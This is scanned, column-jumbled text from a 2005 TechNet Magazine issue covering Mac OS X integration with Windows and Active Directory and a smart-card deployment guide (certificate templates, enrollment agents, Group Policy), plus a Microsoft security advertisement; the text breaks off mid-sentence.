By loading print sharing for Macintosh on 
your server, you will have access to any 
printers that have been shared from your 
Windows server on the Mac clients. Any 
AppleTalk printers connected to the net- 
work can be configured for use by any of 
the Windows-based clients as well. 

When Macintosh printers are shared us- 
ing SFM, the Windows-based server cap- 
tures them. This means that print jobs sent 
from Mac clients are spooled to the server 
first. They are then converted to a bitmap 
format recognizable by the Windows-based 
printer driver and then sent to the printer. 
This allows you to manage Macintosh print 
jobs in the Windows-based print queues 


for AppleTalk, in which case the printers 
will show up on the Macs as AppleTalk 
devices, allowing you to print directly to 
them. Another possibility is to print 
through TCP/IP directly to the printer. 


Native OS X Support 

If you dont need to support the Classic 
Mac environmentat all, you may be able to 
get all the functionality you need right out 
of the box with OS X. OS X has the ability 
to access Windows-based shares without 
any additional server-side configuration. To 
access a file share, tell the Mac which server 
and share you would like to connect to, and 
then authenticate. Press 3£-K, or select Go | 
Command to Server... from the Finder 
menu, and the related dialog box should 
appear (see Figure 1). 


Winter 2005 63 


— SMB/CIFS Filesystem Authentication 


Enter username and password for G: 


Workgroup/Domain 


DOMAIN 


Username 
USER 


Password 


© Add to Keychain 


( Cancel) 


Figure 2 Macintosh Share Login Screen 


Enter your file share following one of the 
formats shown here: 


smb: //servername/sharename 
smb: //fullyqualifieddomainname/sharename 


You will then be prompted with a login 
screen similar to Figure 2. 

If you enter your domain, username, and 
password, you will have access to the share. 
The only configuration requirement for this 
is that you must use TCP/IP. Permissions 
are set on the server and are tied to your 
domain login. OS X doesn't require any spe- 
cial file space or configuration, and files do 
not require a resource and a data fork. In 
fact, the files look as if they came from a 
machine running Windows. You still must 
log in to each resource and youre not inte- 
grated with Active Directory, but you can 
get to file shares a lot more quickly. As an 
added bonus, OS X can be configured to 
show up in a workgroup and share files with 
your Windows-based machines as well. 

There is one caveat: you must know where 
youre going. Because you are not integrated 
with Active Directory, you cannot browse 
for resources past your local subnet. If a 


Once you have authenticated, a list of avail- 
able printers will be displayed. Select the 
printer you want to use and then select the 
correct driver from the Printer Model drop- 
down list. You should now be able to print. 
Printers attached to your OS X machine 
can be made available to Windows-based 
clients as well. 

So how did Apple make such a jump in 
functionality? For years, users have been 
struggling with added services and third- 
party applications like Dave from Thursby 
Software. When Apple scrapped the Mac 
Classic operating system in favor of OS X, 
much of the work was done for them. Be- 
cause OS X is based on Unix, Apple was 
able to integrate Samba, a group of open- 
source Unix applications that use the Server 
Message Block (SMB) protocol. This is the 
protocol used by Windows for client-server 
networking. As such, Apple inherited most 
of this functionality from its Unix back- 
ground. This has not been a trouble-free 
transition, however. 

On a large network, problems quickly 
arise. You still need to log in to each and 
every resource you access. This quickly be- 
comes cumbersome on all but the simplest 
of networks. In addition, the Mac client is 
not a domain member, which means that 
there is no domain login account for it. You 
cannot map your home directory during 
login. Browsing for resources is very lim- 
ited—you can only browse on your local 
subnet. Security becomes an issue because 
the Mac can cache the user names and pass- 
words for the resources it uses. Without an 
Active Directory login, someone could eas- 


You can map a user’s home folder during login 
based upon their profile in Active Directory. 


resource is remote, you need the server 
name or IP address and the name of the 
share to which you would like to connect. 
Printing on a Windows-based network 
from OS X is a little more involved. First, 
you must open System Preferences | Hard- 
ware | Print & Fax, click Set Up Printers, 
and then click Add. Next, select Windows 
Printing, then choose your correct domain 
from Network Neighborhood. Select your 
server and you will be prompted to log in. 


64 TechNet Magazine 


ily gain access to a Mac client and related 
domain resources with the locally cached 
login information. 


The Apple OS X Active 
Directory Client 

Apple has finally given us a way to con- 
nect to Active Directory. In fact, Apple has 
been working on its Active Directory client 
for some time, but it has been plagued by 
bugs and has been very difficult to config- 


ure. Some administrators have had success, 
but even these modest results have typi- 
cally been difficult to reproduce. 

Early implementations of the Apple cli- 
ent required you to make complicated 
schema changes to Active Directory in or- 
der for it to work. This is quite difficult and 
time consuming. Once these changes are 
made, the functionality is not as robust as 
one would hope. When it is working, do- 
main users can authenticate on a Mac and 
gain access to resources on the domain. 
However, browsing remains a problem as 
do home folders, which I'll discuss later. 

Apple recently released OS X 10.3.4. It’s 
important to have this update when using 
Apple clients because it apparently has re- 
solved many issues, but it’s still not perfect. 
A single Active Directory login is now sup- 
ported without making any schema changes 
in Active Directory. This means that you 
can configure a Mac to allow domain user 
accounts to log in, and you can do away 
with local user accounts. Password changes 
and updates are supported from the Mac, 
as are cached passwords for access to your 
account when youre not connected to the 
network. You also have the ability to grant 
administrative access through user names 
and groups from Active Directory. Hourly 
login restrictions are supported as well. 

There is also some support for home 
folders. You can map a user’s home folder 
during login based upon their profile in Ac- 
tive Directory. This is especially useful when 
users have both PC and Mac computers. 
You can use a single login and mount your 
home folder on the Mac, then use it again 
as your home folder on the PC. This makes 
for easy backup and convenient access to 
all of your work. Unfortunately, you cannot 
use this mapped directory as your home 
folder—there is still a separate home folder 
for each user account locally on the Mac, 
which often causes confusion when users 
are saving files and looking for them later. 
Sometimes users think they have saved a 
file on the server-based home folder, when 
in fact these files are located on the local 
Mac drive. DFS volumes also remain un- 
supported. This can be a big problem in an 
enterprise-level environment, as there will 
be resources that the Mac cannot access. 

The client is configured in OS X with a 


utility called Directory Access, located in 


the Applications | Utilities folder. When you 


open the utility, click Enable next to Active 
Directory, and then click Active Directory. 
From this screen you can click Configure, 
and then enter your Active Directory For- 
est and Domain. Enter a computer ID for 


your Mac. Click Unhide Advanced Options, _ 
and select the Cache Last User Login for 
Offline Operation and Allow Administra- 


tion by: check boxes. Add the usernames 
and groups to have administrative access 
to your Mac in the format domain 
name\user or group, and then click Bind. 
You will be prompted for a user account 
with rights to join your domain. Click OK 
and then click Authentication at the top. 
Make sure Active Directory is still high- 


lighted. In the Search dropdown list, click | 
Custom Path, and then click Add at the bot- | 
tom. Select your Active Directory Domain | 


from the list and click Add. Now click Con- 
tacts, and then Add. Last, click Apply and 
close the Directory Access window. After 
you restart, you should be able to log in 
with a domain user account and password. 

Perhaps this still isn’t enough for your us- 
ers. Do you need even more from Active Di- 
rectory? Apple has an update to OS X, version 
10.4 (code-named Tiger), due out next year, 
that promises to solve some of the security 
and configuration issues and provide cleaner 
integration with Active Directory login and 
home directories. Unfortunately, Apple has 


a history of dangling the promise of such — 


features in front of its customers without de- 
livering, so we'll have to wait and see. 


ADmitMac to the 
(Costly) Rescue 

Alternatively, you might want to take a 
look at ADmitMac from Thursby Software. 
ADmitMac is an enhanced Active Direc- 
tory client for OS X. NT LAN Manager ver- 
sion 2 (NTLMv2) and SMB signing are 
both supported. This provides enhanced 
security when connecting to Windows 
Server 2003. If you need access to DFS, 
ADmitMac is the only product I know that 


www.technetmagazine.com 


Open the Direct Access Utility. 


a ff WN = 


Macintosh Direct Access Client Configuration 


Click Enable next to Active Directory, and then click Active Directory. 
Click Configure, then enter your Active Directory Forest and Domain. 
Enter a computer ID for your Mac client. 


Click Unhide Advanced Options, and select the Cache Last User Login for 


Offline Operation and Allow Administration by: check boxes. 


6 Add the usernames and groups that you want to give administrative 
access to your Mac in the format domain name\user or group, and then 
click Bind. You will be prompted for a user account with rights to join your 


domain. 


7 Click OK and then click Authentication at the top. Make sure Active 


Directory is still highlighted. 


8 Click Custom Path in the Search dropdown list, and then click Add at the 


bottom. 


9 Select your Active Directory Domain from the list and click Add. 


10 Click Contacts, and then Add. 


11 Click Apply and close the Directory Access window. 


supports it through OS X. ADmitMac also | 
allows you to map server-based home fold- 


ers for use as home folders on both the Mac 
and the PC. This means that users who have 
both a PC and a Mac can have the same 
home files available to them on either plat- 
form, with a single account and no chance 


expensive if you have a lot of Mac clients. 
So, which approach is best? In most of 
the mixed environments I support, I use 
SFM simply because there always seems to 
bea Classic Mac left hanging around some- 
where. Unfortunately, this is only a halfway 
solution and can often be clumsy, confus- 


Users who have both a PC and a Mac can have 
the same home files available to them on either 
platform, with a single account. 


of confusion between the two. ADmitMac 
can also search published resources avail- 
able in Active Directory. All this is done on 
the client side with no schema changes to 
Active Directory. Nevertheless, don’t get too 
excited—this sounds very promising, but 
there is a catch, as ADmitMac currently 


costs $119 per client. However, you can | 


download a trial version at: www.thursby.com. I 
love to use ADmitMac because it provides 


so much support for the added services of © 
Active Directory, but it can become quite | 


ing, and insecure, particularly when other 
products offer so much more functionality. 

Active Directory integration on OS X has 
been referred to as “The Holy Grail” for 
Apple and its implementation of an Active 
Directory client is improving with each re- 
lease. The first white paper released by Apple 
on Active Directory integration was over 
40 pages long. Hopefully, their client will 
get better with time, but there are still many 
problems. Fixing them would certainly 
make integration decisions aloteasier. @ 


Winter 2005 65 


Brian Komar 


Smart Card 
Deployment 


Kerberos 
Authentication 


AT A GLANCE 


Get Smart! 


Boost Your 


e Using smart cards in an Active 
Directory environment 

e Smart card implementation 
requirements 

e Planning a smart card 
deployment 

e Defining smart card usage 

in organization 


lent of IdentiT Inc, is a principal 
consultant specializing i in PKI consulting engagements. 
He has authored MCSE Training Kits, Microsoft 
Prescriptive Architecture Guides, PKI-white papers, and 
is the coauthor of the Microsoft Windows Security 
Resource Kit. Contact Brian at bkomar@identit. ca 


This article is an excerpt from the book Microsoft 
Windows Server 2003 PKI and Certificate Security 
(Microsoft Press, 2004), 


66 TechNet Magazine 


number (PIN) for the smart card or USB 
token. To initiate a smart card program, an 
organization must deploy the related hard- 
ware and software to each desktop. The re- 
quired hardware includes a smart card 
reader, as well as a smart card that is on the 


Windows’ hardware compatibility list or 
Server 2003 Active Directory’ environ- 


that includes drivers for Windows 2000, 
Windows XP, or Windows Server™ 2003 cli- 
ents on your network. As an alternative, you 
can use a USB token, which is a combina- 
tion USB reader and card. For software, you 
will need a smart card cryptographic ser- 
vice provider (CSP) that allows the 
Microsoft’ cryptographic,application pro- 
gramming interface (CryptoAPI) to inter- 
act with the smart card. 


Network’s IQ 
With Smart Car 


Many organizations are implementing two-factor authentica- 
tion solutions to increase network security. Two-factor authenti- 
cation increases security by requiring something you have, such 

as a smart card or other device with a smart card chip (like a 


USB token), and something you know, such as the personal identification 


Windows currently ships with default 
CSPs for GemPlus, Infineon, and Schlum- 
berger, though these CSPs do not work with 
all versions of these manufacturers’ smart 


- cards. You must determine if updated CSPs 


are required for the smart cards selected by 


» your organization. 


Both Windows 2000 and Windows 


ments support smart card authentication, 
an extension to Kerberos authentication. 


_ This means that only Windows 2000, Win- 


dows XP, and Windows Server 2003 client 


- computers can be used with smart cards in 


an Active Directory environment. 
Smart cards allow Kerberos authentica- 


_ tion through Public Key Initialization 
' (PKINIT) extensions to the Kerberos pro- 


tocol. PKINIT extensions allow a public/ 
private key pair to be used to authenticate 
users when they log onto the network. 


Requirements for Smart Card 
Certificates 
To deploy smart cards ina Windows 2000 
or Windows Server 2003 Active Directory 
environment, the following requirements 
must be met: 
All domain controllers and computers 
in the forest must trust the root Certifi- 
cation Authority (CA) ofthe smart card 
certificate’s certificate chain. 
The CA that issues the smart card cer- 
tificate must be included in the Active 
Directory NT Authority (NTAuth) 
store. Whena CA certificate is added to 
the NTAuth object in Active Directory 
(CN=NTAuthCertificates, CN=Public 
Key Services, CN=Services, CN=Con- 
figuration, DC=ForestRootDomain, 
where ForestRootDomain is the LDAP 
distinguished name of the forest’s root 
domain), the thumbprint of the CAs 
certificate is automatically distributed 
to all Windows 2000 and later domain 
members in the HKEY_LOCAL_MA- 
CHINE\Software\ Microsoft\Enter- 
priseCertificates\NTAuth\ Certificates 
registry key. You can verify the CA cer- 
tificates included in the NTAuth store 
by using the PKI Health Tool (pki- 
view.msc) included in the Windows 
Server 2003 Resource Kit. 
The smart card certificate must con- 
tain the Smart Card Logon (1.3.6.1.4.1. 
311.20.2.2) and Client Authentication 
(1.3.6.1.5.5.7.3.2) object identifier (OID) 
in the Enhanced Key Usage (EKU) ex- 
tension or in the Application Policies 
extension. The Smart Card Logon and 
Client Authentication OIDs must be 
valid in the entire certificate chain. 
The smart card certificate must con- 
tain the user’s UPN in the subject alter- 
native name extension. 
All domain controllers must have a Do- 
main Controller or Domain Control- 
ler Authentication certificate installed. 
Smart card authentication requires mu- 
tual authentication of the user and the 
domain controller involved in the 
Kerberos authentication. 


www.technetmagazine.com 


A Windows Server 2003 Enterprise Edi- 
_ tion CA meets these requirements. Alter- 


natively, a third-party CA can issue a smart 
card certificate, as long as the requirements 
are met. The requirements are detailed in 
Knowledge Base article 281245, “Guidelines 
for Enabling Smart Card Logon with Third- 
Party Certification Authorities” (see sup- 
port.microsoft.com/?id=281245). 


Planning Smart Card 
Deployment 

Let’s begin with determining the assur- 
ance level required for smart card issuance. 


A smart card increases protection for a | 


certificates private key. To compromise a 
smart card’s private key, an attacker must 
obtain the smart card and know the associ- 
ated PIN. As added protection, a smart card 
blocks access to the smart card’s private 
key(s) after a designated number of PIN 


_ failures. The private key can only be ac- 


cessed after the smart card is unlocked. You 
can increase the security of the smart card 
distribution by requiring face-to-face in- 
terviews during enrollment. This requires 
the user to meet with either the enrollment 
agent requesting the smart card certificate 
or with another person, sometimes referred 
to as a local registration authority (LRA), 
who verifies the user's identity. 

To indicate that you have performed a 
face-to-face interview before issuing a 
smart card, you can add a custom certifi- 
cate policy OID to the Issuance Policies ex- 
tension that indicates the measures taken 
to validate the smart card holder’s identity 
before issuance. 

To deploy smart card certificates by us- 
ing face-to-face validation of the user’s 


2.1) in the EKU or Application Policies ex- 
tension of the certificate. This functional- 
ity is provided in the default version 1 
Enrollment Agent certificate template. 

The smart card holder must, at a mini- 
mum, have a certificate that includes the 
Smart Card Logon (1.3.6.1.4.1.311.20.2.2) 
and Client Authentication (1.3.6.1.5.5.7. 
3.2) OIDs in the certificate’s EKU or Appli- 
cation Policies extension. This functional- 
ity is provided in two default version 1 
certificate templates: Smart Card Logon 
and Smart Card User. 

Some organizations choose to implement 
version 2 certificate templates based on the 
default version 1 certificate templates. Ver- 
sion 2 templates allow an organization to 
require validation of an enrollment agent's 
identity, enable autoenrollment for certifi- 
cate renewal, add a certificate policy to de- 
scribe the issuance method of the smart 
card certificate, add application policies to 


A smart card blocks access to its private key 
after a designated number of PIN failures. 


identity, your organization must provide 
certificates for the two roles in smart card 
deployment: the enrollment agent and the 
smart card holder. 

An enrollment agent must hold a certifi- 
cate that allows them to request a smart card 
certificate on behalf of another user. This is 


_ made possible by including the Certificate 


Request Agent OID (1.3.6.1.4.1.311.20. 


the smart card certificate, and enforce the 
use of a specific smart card CSP. 

Once you determine which certificate 
templates to implement for enrollment 
agents and smart cards, the next step is to 
decide how to distribute the certificates to 
the desired holders. There are three com- 
mon methods for deploying smart card cer- 
tificates: implementing enrollment agents, 


Winter 2005 


2 
| 
o 
Q 
Q) 
a 
oO 
0 
© 
ack 
(@) 
‘< 
a 
Oo. 
Ss 
a 


67 


Custom Enrollment Agent Properties = 


General | Request Handling | Subject Name | | 
Issuance Requirements. | Superseded Templates | Extensions | Security | | 


I~ This number of authorized signatures: fe 


If you require more than one signature, autcenrollment is not allowed. 


Require the following for reenrallment: 


© Same criteria as for enrollment 
Valid existing certificate 


0 [Lee] 


Figure 1 Issuance Requirements 


using autoenrollment for initial distribu- 
tion of certificates, and using autoenroll- 
ment for smart card certificate renewal. 

An enrollment agent requests a smart 
card certificate on behalf of each user. The 
enrollment agent signs the certificate re- 
quest with a certificate that includes the Cer- 


tificate Request Agent object identifier in | 


the EKU or Application Policy extension of 
the enrollment agent's certificate. In addi- 
tion to issuing the smart card certificate to 
a user, the enrollment agent also validates 
the identity of the requesting user by in- 
specting identification such as a driver's li- 
cense or a passport. 

The enrollment agent must use the Cer- 
tificate Services Web Enrollment pages to 
request the smart card certificate on behalf 
of another user. The Smart Card enrollment 
pages must be added to the Local intranet 
security zone and allow untrusted ActiveX” 
controls to be downloaded. 

Autoenrollment can be used in imple- 
mentations where additional identity vali- 


prompted to input their smart card during 
the autoenrollment process. 

Under the default settings, the process of 
smart card certificate renewal is the same 


process used for initial enrollment. In other 
words, if you have to undergo a background » 
_ check to receive your initial smart card, you | 
must undergo the same background check 

' to renew the certificate. However, you can 
: reduce the security requirements for smart 


card renewal. For instance, if you can pro- 
vide evidence that you have already under- 
gone the background check, there is no 
need to undergo it again. Two solutions ex- 
ist to meet this type of deployment: 
You can configure the certificate tem- 
plate to renew the certificate automati- 
cally if users hold existing certificates 
based on the existing version of the cer- 
tificate template. By holding an exist- 
ing certificate, users provide evidence 
that they have undergone the required 
validation process. 
You can require users to sign the cer- 
tificate renewal request with the exist- 
ing smart card certificate. By signing 
the certificate request, the requestors 
prove they can access the private key of 
the previous smart card certificate, thus 
proving that they are the same person 
that requested the original certificate. 


Certificate Template Design 
and Configuration 

Once you determine how smart cards are 
to be used in your organization and how 
the certificates are to be deployed, you can 
define the certificate templates. Most orga- 
nizations use the default Enrollment Agent 
certificate template. If you implement this 
template, my only recommendation is that 


Autoenroliment can be used in implementations 
where additional identity validation measures 
are not required. 


dation measures are not required. When 
autoenrollment is used, you must ensure 
that smart cards, smart card readers, and 


support software such as smart card man- 


agement software and CSPs are distributed 
to the users before autoenrollment is initi- 
ated. In this solution, the user will be 


68 TechNet Magazine 


you modify the permissions to allow a cus- 
tom global or universal group (in the case 
of a multiple domain forest) only Read and 
Enroll permissions. Remove the Enroll per- 
mission assignment for members of the En- 
terprise Admins and forest root domain’s 
Domain Admins groups to prevent unau- 


thorized registration of the Enrollment 
Agent certificate template. 

Ifyou want to implement certificate man- 
ager approval for enrollment agent certifi- 
cates, you must create a version 2 certificate 
template based on the version 1 Enrollment 
Agent certificate template. In the version 2 
certificate template definition, configure the 
Issuance Requirements tab (see Figure 1). 

In addition, it is recommended that you 
add the version 1 Enrollment Agent certifi- 
cate template to the Superseded Templates 
tab and restrict enrollment permissions to 
acustom universal or global group that con- 
tains all designated enrollment agents. 

Once the required enrollment agents 


_ have obtained their Enrollment Agent cer- 


tificates, consider removing the Enrollment 
Agent certificate templates from all CAs in 
the organization. To help prevent unautho- 
rized certificate enrollment of Enrollment 
Agent certificates, only publish the certifi- 
cate template on a CA when a new enroll- 
ment agent must be designated or when 
certificate renewal is required. 

When youare using smart cards, it is rec- 


ommended that you create a custom ver- 


sion 2 certificate template based on either 
the default Smart Card Logon or Smart 
Card User version 1 certificate templates. 
The version 2 certificate templates give you 
greater flexibility in the configuration of the 
certificate contents. 

Figure 2 lists the recommended modifi- 
cations to the version 2 certificate template. 
This certificate template can be published 
at multiple CAs for fault tolerance and must 
be available at all times to allow an enroll- 
ment agent to create a smart card for any 
user at any time. 

If your organization's security policy re- 
quires the same subject validation process 
for initial smart card enrollment and re- 


' newal, you can use the custom certificate 


template just described. When a smart card 
certificate is expiring, users can return to 
the enrollment agent, who can re-enroll on 
their behalf and provide them with a re- 
placement certificate. If your company has 
standardized on machines running Win- 
dows XP, there is an alternative option that 
takes advantage of autoenrollment and the 
ability to sign a certificate by using the ini- 
tial smart card certificate. 


To take this route you create a custom 
version 2 certificate template that enables 
autoenrollment if the certificate request is 
signed with a previous smart card certifi- 
cate. At the time the previous smart card 
certificate nears expiration, the autoen- 
rollment process will prompt the user to 
sign the certificate request with his existing 
smart card certificate. When the renewal is 
performed, the previous smart card certifi- 
cate is archived and the updated certificate 
remains as the active certificate. 

Figure 3 explains how to configure a ver- 
sion 2 certificate template to use autoen- 
rollment for smart card certificate renewal. 
The certificate template can be based on 
either the Smart Card Logon or Smart Card 
User certificate template. 

The renewal smart card certificate tem- 
plate can be published at multiple CAs for 
fault tolerance and must be available at all 
times to allowan enrollment agent to create 
asmart card for any user at any time. 


Deploying a Smart Card 
Management System 

A smart card deployment must look be- 
yond the issuance of smart card certificates. 
In addition to getting the smart cards to 
the users, the deployment must address the 
customization of the smart card enrollment 
pages and smart card PIN resets. 

First of all, you can customize the default 
enrollment pages with modifications that 
can include such things as adding your 
organization’s logo, changing the signing re- 
quirements for a smart card certificate, or 
simplifying the user experience by remov- 
ing the multitude of options available when 
the user requests a certificate. 

In terms of pin resets, most smart cards 
(by default) prevent the user from access- 
ing the smart card’s private key if the smart 
card PIN is entered incorrectly three con- 
secutive times. Your organization must de- 
velop custom software or use commercial 
software to allow the remote reset of a user's 
smart card. For these solutions, look to the 
software development kits for the specific 
smart card vendor or to third-party man- 
agement systems, such as those available 
from Alacris (www.alacris.com) and from 
Spyrus (www.spyrus.com ). 

You should remember that smart cards 


www.technetmagazine.com 


are not a panacea for authentication secu- 
rity. And, there are some applications that 
cannot use smart cards as an authentica- 
tion mechanism. During a recent smart 
card pilot project at Microsoft, where users 
were required to use smart cards for all 
forms of authentication, several applica- 
tions would not work with the updated 
smart card authentication. 

Outlook Web Access, for example, does 
not support smart card authentication. You 
must type credentials into a form or use 
basic authentication protected by Secure 


narios contain configuration options that 


_ do not support the use of smart card au- 


thentication. For example, if the user ac- 
count and the mail box are situated in 
different forests, smart card authentication 
is not possible. Another option that does 
not support smart card authentication is 
the implementation of Remote Procedure 
Calls over HTTP in Microsoft Outlook’. 
Service accounts and batch files also can- 
not use a smart card for authentication. A 
scheduled task that implements a service's 
account will not prompt for smart card in- 


Sockets Layer (SSL). 


Some Exchange Server deployment sce- 


sertion or for the input of a PIN to access 
the private key material on the smart card. 


Figure 2 Custom Initial Smart Card Certificate Template 


Tab 
General 


Recommendations 


Create a custom Template Display Name and Template Name, 
based on the organization name, that specifies that the 
certificate template is for enrollment agents. The validity period 
is typically no longer than one year. 


Request Handling 


Make the following changes on the Request Handling tab: 

m Change the Purpose dropdown list to Signature and Smart 
Card Logon to prevent the smart card from being used for 
encryption. Setting the purpose to Signature and Smart Card 
Logon ensures that the user is prompted during enrollment 
to input the smart card’s PIN. 

m Increase the minimum key size to 1,024 bits if using smart 
cards with 8KB or more storage space. 

m Define the specific smart card CSP you want to use with the 
certificate template. 


Subject Name 


The only requirement here is that you ensure that the UPN 
option is enabled. You should enable the e-mail name options if 
you intend to use the smart card for S/MIME e-mail purposes. 


Issuance Requirements 


In order to enable enrollment by an enrollment agent, you need 
to configure the certificate template to require one authorized 
signature, with the signing certificate containing the Certificate 
Request Agent OID. 


Superseded Templates 


Add both the Smart Card User and Smart Card Logon 
certificate templates, designating that the custom version 2 
certificate template is the organization’s preferred version. 


Extensions 


For application policies, include the Smart Card Logon and 
Client Authentication. If you want to use the smart card for 
signing e-mail, include the Secure E-mail OID. In addition, add a 
custom application policy OID that indicates that the certificate 
is YourOrganization’s smart card. This OID can be used in 
applications, such as the Microsoft RADIUS server, to restrict 
certificate usage to only certificates with this custom OID. 

Add a custom certificate policy OID that defines the process 
used for the smart card certificate. The custom issuance policy 
OID can also include a Web URL reference that provides a text 
description of the process. 


Security 


Modify the permissions for the certificate template so that only 
a custom global or universal group that contains all enrollment 
agents has Read and Enroll permissions. Consider removing 
the Enroll permission assignment from the Enterprise Admins 
and forest root’s Domain Admins groups. 


Winter 2005 69 


Figure 3 Custom Renewal Smart Card Certificate Template 


Tab 
General 


Recommendations 


Create a custom Template Display Name and Template Name, 
based on the organization name, that specifies that the 
certificate template is for smart card renewal only. Set the 
validity period to no longer than one year. 


To prevent the user from continually requesting the replace- 
ment smart card certificate, enable Publish Certificate in Active 
Directory and Do Not Automatically Re-Enroll if a Duplicate 
Certificate Exists in Active Directory. This publishes the issued 
certificate in the userCertificate attribute of the user account 
and prevents re-enrollment if a certificate is already published 
to the user account. 


Request Handling 


Change the Purpose dropdown list to Signature and Smart Card 
Logon, increase the minimum key size to 1,024 bits if using 
smart cards with 8KB or more storage space, and define the 
smart card CSP you want to use with the certificate template. 


Subject Name 


The only required name format for smart card login is to ensure 
that the UPN option is enabled. Also, enable the e-mail name 
options if you intend to use the smart card for S/MIME e-mail. 


Issuance Requirements 


Configure the Issuance Requirements tab to require one 
authorized signature, with the signing certificate containing the 
Smart Card Logon OID. If you have implemented a custom 
application policy OID based on your organization, require this 
custom application policy OID for signing instead of the Smart 
Card Logon OID. 


Superseded Templates 


Add the initial smart card logon certificate template defined in 
Figure 2. The addition of the superseded template allows 
autoenrollment to initiate. 


Extensions 


For application policies, ensure that you include the Smart Card 
Logon and Client Authentication. If you want to use the smart 
card for signing e-mail, include the Secure Email OID. In 
addition, continue adding a custom application policy OID that 
indicates that the certificate is YourOrganization’s Smart Card 
to allow continued autoenrollment processing for certificate 
renewal when the certificate expires. 


For issuance policies, add a custom certificate policy OID that 
defines the process used for the smart card certificate. The 
custom issuance policy OID can also include a Web URL 
reference that provides a text description of the process. 


Security 


Modify the permissions for the certificate template so that only 
a custom global or universal group that contains all smart card 
holders has Read, Enroll, and Autoenroll permissions. 


If a workstation is not joined to a do- | 


main, Windows NT Lan Manager (NTLM) 
authentication is used to authenticate the 
account and password combination re- 


quired. Since smart cards require Kerberos 


authentication, they cannot be used in this 


smart cards cannot be used for authentica- 


tion purposes. Only applications using | 
Kerberos that support PKINIT extensions | 


will work with smart cards. 


70 TechNet Magazine 


Defining Smart Card Usage in 
Your Organization 
Once you have deployed smart cards to 


the users in your organization, youcan fine- 


tune security settings in Active Directory 


' and other services to define how the smart 
scenario. If an application uses Basic Au- 
thentication or NTLM authentication, | 


cards are to increase network security. The 
settings that you can define include: 
Requiring smart cards for interactive 
logon 
Requiring smart cards for remote ac- 
cess logon 


Defining smart card removal behavior 

Using smart cards for the various ad- 

ministrative tasks 

Through group policy, you can define 
whether smart cards are required for inter- 
active logon by using the Interactive Logon: 
Smart Card Required Group Policy setting. 
This setting, defined in Computer Settings 
| Windows Settings | Security Settings | Lo- 
cal Policies | Security Options, enforces 
smart card logon for all users on computers 


_ where the Group Policy setting is defined. 


Alternatively, you can enable the “Smart 


_ Card Is Required For Interactive Logon’ op- 


tion on the Account tab of the user’s object 
in Active Directory. This method gives you 
more flexibility in that you can enforce 
smart cards on a user-by-user basis. 

Do not enable the Smart Card Is Re- 
quired For Interactive Logon and the User 
Must Change Password At Next Logon op- 
tions for a user account. When you enable 
the Smart Card Is Required For Interactive 
Logon option in a Windows Server 2003 
environment, the operating system takes 
over user password management. The op- 
erating system assigns a maximum-length 


_ password that is equivalent to 255 charac- 
' ters and ensures that the password meets 


complexity requirements, effectively block- 
ing the user from logging onto the network 
by using a password. 

When you enforce smart card logon in 
your domain, you must also ensure the 
validity and availability of the CRL Distri- 
bution Point (CDP) and Authority Infor- 
mation Access (AIA) URLs in the smart 
card certificates as well as all CA certifi- 
cates in the certification chain. The domain 


_ controller accepting the smart card authen- 


tication attempt will perform a revocation 
check on the smart card certificate during 
the logon process. 

To enforce smart card authentication for 
remote access, you must configure a remote 
access policy at a remote access server or a 
RADIUS server to require Extensible Au- 
thentication Protocol with Transport Layer 


_ Security (EAP/TLS) authentication in the 


profile settings. 

When you enforce EAP/TLS authenti- 
cation, you can elect to restrict client cer- 
tificates to a smart card or other certificate. 
The only additional configuration required 


Millions of your peers are turning to the Security Guidance Center for the latest in security. By visiting regularly, 
they get the tools, guidance, and training needed for better protection against viruses and other security threats. 
Visit microsoft.com/security/IT today and see for yourself the newest additions, including: 


Microsoft® Windows’ XP Service Pack 2 with Advanced Security Technologies Download it for free 
and evaluate the latest updates for increased system control and proactive protection against security threats. 


you evaluate your organization's security practices, and identify areas for improvement. 


Free Updates and E-mail Alerts Stay on top of the latest security issues quickly and 
easily by signing up for free Microsoft Security Communications. 


Free Security Tools React more effectively to potential security threats. Take advantage of 
free tools and technologies like the Microsoft Baseline Security Analyzer and Software Update Services. 


Go today to microsoft.com/security/IT 


Micresoft: 


© 2004 Microsoft Corporation. All rights reserved. Microsoft and Windows are either registered trademarks or trademarks of 
Microsoft Corporation in the United States and/or other countries. 


at the Routing and Remote Access (RRAS) | 
server or the Internet Authentication Ser- | 
vices (IAS) server is to designate the Server 
Authentication certificate used by the server 


for mutual authentication. 


the action that takes place when users re- 


move their smart cards from a smart card 


reader by using the Interactive Logon: 
Smart Card Removal Behavior Group 


Policy setting. This setting, definedin Com- 
puter Settings | Windows Settings | Secu- 
rity Settings | Local Policies | Security | 


Options, ensures that smart card removal 
behavior is consistent for all computer ac- 
counts in the OU or domain where the 
Group Policy is applied. 

In this Group Policy setting, you can de- 
fine the removal behavior one of three ways: 
No Action The default setting. The removal 
of the smart card does not lock the work- 
station or log off the current user. 

Lock Workstation The removal of the 
smart card causes the workstation to lock. 


The user must press Log On Interactively 


or provide the PIN for the smart card to 
unlock the workstation. 

Force Logoff The user currently logged on 
is automatically logged off. 

In a pure Windows 2000 network, it was 
not possible to use smart cards for all ad- 
ministrative tasks. Several tasks still re- 
quired the input of user credentials and 
passwords, reducing the security gains ac- 
complished through the issuance and us- 
age of smart cards. Windows XP and 


72 TechNet Magazine 


Windows Server 2003 offer enhancements | 
that enable additional usage of smart cards | 
in administrative activities, including the © 
RunAs, Net Use, and DCPromo com- | 
/ mands, and Terminal Services. 
Group Policy also allows you to define | 


The RunAs command allows you to run 
a program in a security context other than 
that of the currently logged on user. For 


date your identity in the DCPromo wizard. 
The computer must be a member of the 
forest before running DCPromo; otherwise 
the option is not available. This option is 


' only available on computers running Win- 


dows Server 2003. 
A user can use her smart card to connect 
to the Remote Desktop Service (or Termi- 


If you are using a third-party CSP, it must be 
loaded at both the remote client and the remote 
desktop server. 


example, ifadministrators have day-to-day | 
accounts and smart cards for administra- | 
tive tasks, they can use the RunAs com- | 
mand to run administrative tasks with their 
smart cards, whether accessed via the GUI | 
or from the command line. From the com- | 
mand line, you can add the /smartcard | 


switch; from the GUI, you can elect to use a 
smart card for authentication. 

Like the RunAs command, you can 
choose to use a smart card to provide cre- 
dentials for network drive mapping. From 
the command line, you must use the 
/smartcard switch to designate that the cre- 
dentials are read from a smart card. Like- 


wise, from the GUI, you can choose to | 


connect with a different user name and then 
select the smart card from the list of avail- 
able credentials. 


If the computer you are promoting toa | 
domain controller is already a member of | 


the forest, you can use a smart card to vali- 


nal Services) running on Windows XP or 
Windows Server 2003, as long as the host 
computer is a member of an Active Direc- 
tory domain. The Windows XP and Win- 
dows Server 2003 Remote Desktop client 
accepts smart cards as a form of authenti- 
